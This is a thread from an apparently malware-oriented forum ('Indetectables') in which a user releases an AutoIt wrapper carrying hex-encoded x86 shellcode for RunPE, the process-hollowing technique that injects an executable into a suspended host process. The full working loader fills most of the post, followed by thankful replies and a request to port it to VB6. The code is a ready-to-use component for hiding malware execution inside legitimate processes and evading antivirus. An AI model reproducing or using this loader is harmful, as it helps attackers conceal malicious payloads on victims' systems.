Indetectables

Wardow escribió: Hello!

I'm here to release a RunPE Shellcode I have made.

Informations:

Gets Kernel32 and Ntdll modules addresses from PEB
Resolves needed functions pointers by walking on the EAT
Is able to apply fixups
Supports Unicode
Does apply proper section memory protection flags
Will technically never fail when the file has a relocation table (fixups)
You can pass custom arguments, program to hollow
Should be the most stable possible
There should not be any memory leak

Call chain:
ntdll!RtlZeroMemory, CreateProcessW, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAlloc, VirtualAllocEx, ntdll!memcpy, WriteProcessMemory, VirtualProtectEx, SetThreadContext, ResumeThread

Mostrar/Ocultar

#cs ----------------------------------------------------------------------------
 
 AutoIt Version: 3+
 Author:         Wardow
 
 Script Function:
    x86 RunPE Shellcode wrapper.
 
#ce ----------------------------------------------------------------------------
 
$ProcessId = RunPE(@AutoItExe, "", FileRead("Application.exe"))
MsgBox(64, "RunPE has been executed", "ProcessId: " & $ProcessId)
 
Func RunPE($wPath, $wArguments, $lpFile)
 
Local $Bin_Shellcode = "0x558BEC8B4D088BC18039007406408038"
$Bin_Shellcode &= "0075FA2BC15DC20400558BEC56578B7D"
$Bin_Shellcode &= "0833F657E8D7FFFFFF8BC885C974200F"
$Bin_Shellcode &= "BE07C1E60403F08BC625000000F0740B"
$Bin_Shellcode &= "C1E81833F081E6FFFFFF0F474975E05F"
$Bin_Shellcode &= "8BC65E5DC20400558BEC51515356578B"
$Bin_Shellcode &= "7D0833F68B473C8B44387803C78B5020"
$Bin_Shellcode &= "8B581C03D78B482403DF8B401803CF89"
$Bin_Shellcode &= "55FC894DF889450885C074198B04B203"
$Bin_Shellcode &= "C750E882FFFFFF3B450C74148B55FC46"
$Bin_Shellcode &= "3B750872E733C05F5E5B8BE55DC20800"
$Bin_Shellcode &= "8B45F80FB704708B048303C7EBE9558B"
$Bin_Shellcode &= "EC8B4D0833D28BC1663911740883C002"
$Bin_Shellcode &= "66391075F82BC183E0FE5DC20400558B"
$Bin_Shellcode &= "EC5356578B7D0885FF74578B5D0C85DB"
$Bin_Shellcode &= "745057E8C6FFFFFF538BF0E8BEFFFFFF"
$Bin_Shellcode &= "3BF0753E2BDFC74508610000000FB70F"
$Bin_Shellcode &= "8BD10FB7343B8BC6663B4D08720681C2"
$Bin_Shellcode &= "E0FF0000663B7508720505E0FF000066"
$Bin_Shellcode &= "3BD0750E6685C9740583C702EBCF33C0"
$Bin_Shellcode &= "EB0333C0405F5E5B5DC20800558BEC64"
$Bin_Shellcode &= "A13000000056578B400C8B780C8BF7FF"
$Bin_Shellcode &= "7508FF7630E874FFFFFF85C0740A8B36"
$Bin_Shellcode &= "3BF775EB33C0EB038B46185F5E5DC204"
$Bin_Shellcode &= "00558BEC81EC24040000837D08005356"
$Bin_Shellcode &= "570F84DC050000837D10000F84D20500"
$Bin_Shellcode &= "006A6B586A65596A7266894588586A6E"
$Bin_Shellcode &= "5E6A6C5F6A336689458C586A32668945"
$Bin_Shellcode &= "94586A2E5A6A646689459633C066894D"
$Bin_Shellcode &= "8A66894D9059668945A06A7458668945"
$Bin_Shellcode &= "A633C0668945B68D45A4506689758E66"
$Bin_Shellcode &= "897D926689559866894D9A66897D9C66"
$Bin_Shellcode &= "897D9E668975A466894DA866897DAA66"
$Bin_Shellcode &= "897DAC668955AE66894DB066897DB266"
$Bin_Shellcode &= "897DB4E824FFFFFF8BF88D458850E819"
$Bin_Shellcode &= "FFFFFF8BD8C78528FFFFFF793A3C078D"
$Bin_Shellcode &= "45C4C7852CFFFFFF794A8A0B8985ECFE"
$Bin_Shellcode &= "FFFF8D45D88985F0FEFFFF8D45B88985"
$Bin_Shellcode &= "F4FEFFFF8D45848985F8FEFFFF8D45DC"
$Bin_Shellcode &= "8985FCFEFFFF8D8574FFFFFF898500FF"
$Bin_Shellcode &= "FFFF8D45D0C78530FFFFFFEE38830CC7"
$Bin_Shellcode &= "8534FFFFFF5764E101C78538FFFFFF18"
$Bin_Shellcode &= "E4CA08C7853CFFFFFFE3CAD803C78540"
$Bin_Shellcode &= "FFFFFF99B04806C78544FFFFFF93BA94"
$Bin_Shellcode &= "03C78548FFFFFFE4C7B904C7854CFFFF"
$Bin_Shellcode &= "FFE487B804C78550FFFFFFA92DD701C7"
$Bin_Shellcode &= "8554FFFFFF05D13D0BC78558FFFFFF44"
$Bin_Shellcode &= "27230FC7855CFFFFFFE86F180DC78560"
$Bin_Shellcode &= "FFFFFFB57DAE09898504FFFFFF8D8570"
$Bin_Shellcode &= "FFFFFF898508FFFFFF8D458089850CFF"
$Bin_Shellcode &= "FFFF8D8578FFFFFF898510FFFFFF8D85"
$Bin_Shellcode &= "7CFFFFFF898514FFFFFF8D45C0898518"
$Bin_Shellcode &= "FFFFFF8D856CFFFFFF89851CFFFFFF8D"
$Bin_Shellcode &= "45BC898520FFFFFF8D45E0898524FFFF"
$Bin_Shellcode &= "FF33C08BF0FFB4B528FFFFFF83FE028B"
$Bin_Shellcode &= "C70F4FC350E8DDFCFFFF8B8CB5ECFEFF"
$Bin_Shellcode &= "FF890185C00F84E80300004683FE0F7C"
$Bin_Shellcode &= "D433C040898564FFFFFF8D45E46A1050"
$Bin_Shellcode &= "FF55D86A448D85A8FEFFFF50FF55D868"
$Bin_Shellcode &= "CC0200008D85DCFBFFFFC785A8FEFFFF"
$Bin_Shellcode &= "4400000050FF55D88B4D1033D2C785DC"
$Bin_Shellcode &= "FBFFFF070001008BFA8B713C03F10FB7"
$Bin_Shellcode &= "46148955FC8955CC8945C83996A00000"
$Bin_Shellcode &= "0074163996A4000000740EF646160175"
$Bin_Shellcode &= "0833DB43895DF8EB058BDA8955F833C0"
$Bin_Shellcode &= "8955D46639110F94C03D4D5A00000F84"
$Bin_Shellcode &= "4F03000033C039160F94C03D50450000"
$Bin_Shellcode &= "0F843D03000033C0663956040F94C03D"
$Bin_Shellcode &= "4C0100000F84290300008D45E4508D85"
$Bin_Shellcode &= "A8FEFFFF5052526A04525252FF750CFF"
$Bin_Shellcode &= "7508FF558485C00F84C50200008D85DC"
$Bin_Shellcode &= "FBFFFF50FF75E8FF558085C00F84B002"
$Bin_Shellcode &= "000033C0506A048D45CC508B8580FCFF"
$Bin_Shellcode &= "FF83C00850FF75E4FF957CFFFFFF85C0"
$Bin_Shellcode &= "0F848C0200008B45CC3B4634750F50FF"
$Bin_Shellcode &= "75E4FF55B885C00F85750200006A4068"
$Bin_Shellcode &= "00300000FF765033C050FF9574FFFFFF"
$Bin_Shellcode &= "8BF885FF0F84580200006A4068003000"
$Bin_Shellcode &= "00FF7650FF7634FF75E4FF55DC8945FC"
$Bin_Shellcode &= "85C0754185DB7518FF7634FF75E4FF55"
$Bin_Shellcode &= "B86A406800300000FF7650FF7634EB14"
$Bin_Shellcode &= "6A406800300000FF765033C0C745D401"
$Bin_Shellcode &= "00000050FF75E4FF55DC8945FC85C00F"
$Bin_Shellcode &= "84FD010000FF7654FF751057FF55C433"
$Bin_Shellcode &= "C933C0894DF4663B4606732E8B5DC883"
$Bin_Shellcode &= "C32C03DEFF73FC8B03034510508B43F8"
$Bin_Shellcode &= "03C750FF55C48B4DF48D5B280FB74606"
$Bin_Shellcode &= "41894DF43BC87CDC33C98B5F3C8B45FC"
$Bin_Shellcode &= "03DF837DD4008943340F848100000083"
$Bin_Shellcode &= "7DF800747B8B93A000000003D7894DF8"
$Bin_Shellcode &= "398BA400000076688B420483E808894D"
$Bin_Shellcode &= "F4A9FEFFFFFF76410FB74C4A086685C9"
$Bin_Shellcode &= "74248B463481E1FF0F0000030A290439"
$Bin_Shellcode &= "8B45F40FB74C42088B433481E1FF0F00"
$Bin_Shellcode &= "00030A0104398B42048B4DF483E80841"
$Bin_Shellcode &= "D1E8894DF43BC872BF8B4DF8034A0403"
$Bin_Shellcode &= "52043B8BA40000006A00894DF8597298"
$Bin_Shellcode &= "33DB53FF765057FF75FCFF75E4FF55D0"
$Bin_Shellcode &= "85C00F840C0100008D8568FFFFFF506A"
$Bin_Shellcode &= "02FF7654FF75FCFF75E4FF55BC85C00F"
$Bin_Shellcode &= "84EF00000033C0895DF8663B4606736F"
$Bin_Shellcode &= "8B5DC883C33C03DE8B03A90000002074"
$Bin_Shellcode &= "1985C079046A40EB172500000040F7D8"
$Bin_Shellcode &= "1BC083E01083C010EB1585C079056A04"
$Bin_Shellcode &= "58EB0CA9000000406A00580F95C0408D"
$Bin_Shellcode &= "8D68FFFFFF5150FF73E48B43E80345FC"
$Bin_Shellcode &= "50FF75E4FF55BC85C074128B4DF883C3"
$Bin_Shellcode &= "280FB7460641894DF83BC8729B33DB68"
$Bin_Shellcode &= "008000005357FF55C085C07467536A04"
$Bin_Shellcode &= "8D45FC508B8580FCFFFF83C00850FF75"
$Bin_Shellcode &= "E4FF55D085C0744C8B46280345FC8985"
$Bin_Shellcode &= "8CFCFFFF8D85DCFBFFFF50FF75E8FF95"
$Bin_Shellcode &= "78FFFFFF85C0742CFF75E8FF956CFFFF"
$Bin_Shellcode &= "FF85C0741F837DE4007406FF75E4FF55"
$Bin_Shellcode &= "E0837DE8007406FF75E8FF55E08B45EC"
$Bin_Shellcode &= "EB4333DB837DE400741053FF75E4FF95"
$Bin_Shellcode &= "70FFFFFFFF75E4FF55E0837DE8007406"
$Bin_Shellcode &= "FF75E8FF55E085FF740A680080000053"
$Bin_Shellcode &= "57FF55C08B8564FFFFFF83F8050F8620"
$Bin_Shellcode &= "FCFFFF33C05F5E5B8BE55DC20C00"
 
Local $lpShellcode = DllCall("kernel32", "ptr", "VirtualAlloc", "dword", 0, "dword", BinaryLen($Bin_Shellcode), "dword", 0x3000, "dword", 0x40)
If Not @error And $lpShellcode[0] Then
    $lpShellcode = $lpShellcode[0]
Else
    Return False
EndIf
 
Local $Shellcode_Struct = DllStructCreate("byte shellcode[" & BinaryLen($Bin_Shellcode) & "]", $lpShellcode)
Local $File_Struct = DllStructCreate("byte lpfile[" & StringLen($lpFile) & "]")
 
DllStructSetData($Shellcode_Struct, "shellcode", $Bin_Shellcode)
DllStructSetData($File_Struct, "lpfile", $lpFile)
 
Local $Ret = DllCallAddress("dword", $lpShellcode + 0x181, "wstr", $wPath, "wstr", $wArguments, "ptr", DllStructGetPtr($File_Struct))
 
DllCall("kernel32", "dword", "VirtualFree", "dword", $lpShellcode, "dword", 0, "dword", 0x8000)
 
If Not @error And $Ret[0] Then
    Return $Ret[0]
Else
    Return False
EndIf
 
EndFunc

Creditos: Wardow (Raped Pony).

//Regards.

hermano excelente contribución

Lindo runpe Scorpio gracias no conocia la DllCallAddress de autoit se nota que no le doy a ese lenguaje

Saludos...

Gracias Scorpio.

Gracias Scorpio,i will deff look at this this weekend. Gracias por traerlo

Buenisima las caracteristicas del runpe sobretodo lo de resolver las apis con el EAT,alguien sabe portarlo a vb6?

Indetectables

x86 RunPE Shellcode Wrapper

x86 RunPE Shellcode Wrapper

Re: x86 RunPE Shellcode Wrapper

Re: x86 RunPE Shellcode Wrapper

Re: x86 RunPE Shellcode Wrapper

Re: x86 RunPE Shellcode Wrapper

Re: x86 RunPE Shellcode Wrapper